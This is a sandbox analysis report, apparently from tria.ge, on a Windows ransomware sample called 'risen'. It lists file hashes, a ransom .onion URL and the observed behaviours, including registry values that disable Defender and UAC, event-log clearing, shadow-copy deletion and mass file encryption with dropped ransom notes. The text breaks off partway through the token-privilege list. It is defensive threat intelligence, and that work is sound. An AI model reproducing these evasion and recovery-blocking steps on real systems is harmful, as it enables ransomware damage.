Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
300s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
15/05/2024, 15:52
Behavioral task
behavioral1
Sample
risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe
Resource
win10v2004-20240426-en
General
-
Target
risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe
-
Size
149KB
-
MD5
0444b3d690823924667302cfae1f0655
-
SHA1
737d0d001e60ce20c8f35a2bbac0f4d525b96174
-
SHA256
3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5
-
SHA512
5dacf16ce60bb5191708de906a920ab63fa3d5458fc7331013d8c3997beae802f0ea4b318392b1c4c6e15417a15423661e6bb4cb072adb33338493b1aac2c57d
-
SSDEEP
3072:wz5vBHTp2Obwai/tge32Vhh53u8rrsusAkeOe494flyntoGNout:wtvBlZc/tZ3yh53u8rg/AkFe4ufkntVZ
Malware Config
Extracted
C:\ProgramData\$Risen_Guide.hta
http://s2wk77h653qn54csf4gp52orhem4y72dgxsquxulf255pcymazeepbyd.onion/
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 8312 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 7852 wevtutil.exe 6968 wevtutil.exe 8664 wevtutil.exe 5700 wevtutil.exe 8104 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 8328 bcdedit.exe 7924 bcdedit.exe -
Renames multiple (3367) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8660 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation cmd.exe -
resource yara_rule behavioral2/memory/112-0-0x00000000001F0000-0x000000000025E000-memory.dmp upx behavioral2/memory/112-15651-0x00000000001F0000-0x000000000025E000-memory.dmp upx behavioral2/memory/112-29866-0x00000000001F0000-0x000000000025E000-memory.dmp upx behavioral2/memory/112-29868-0x00000000001F0000-0x000000000025E000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\Z: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\N: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\L: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\X: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\I: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\O: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\V: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\B: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\U: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\J: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\G: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\K: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\M: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\E: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\T: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\P: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\A: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\S: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\R: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened (read-only) \??\H: risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\RisenBackGround.JPG" risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files\AddCompress.mpeg risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\my\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_signed_out.svg risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ca-es\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ar-ae\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\it-it\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\he-il\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\main-selector.css risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\cloud_icon.png risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ca-es\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right-pressed.gif risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files\VideoLAN\VLC\locale\km\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pl-pl\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\cef\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ru_get.svg risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\ui-strings.js risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\$Risen_Note.txt risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\$Risen_Guide.hta risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\$Risen[AAFJKAF8XA].Private risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 8756 3612 WerFault.exe 247 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1448 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 8016 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7608 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5064 PING.EXE -
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeRestorePrivilege 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeBackupPrivilege 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeTakeOwnershipPrivilege 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeAuditPrivilege 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeSecurityPrivilege 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeIncBasePriorityPrivilege 112 risen_exe_3b685f4a59211225997256a5cd900f44953bba276b6eb92545966b35b6ef89b5.exe Token: SeBackupPrivilege 4424 vssvc.exe Token: SeRestorePrivilege 4424 vssvc.exe Token: SeAuditPrivilege 4424 vssvc.exe Token: 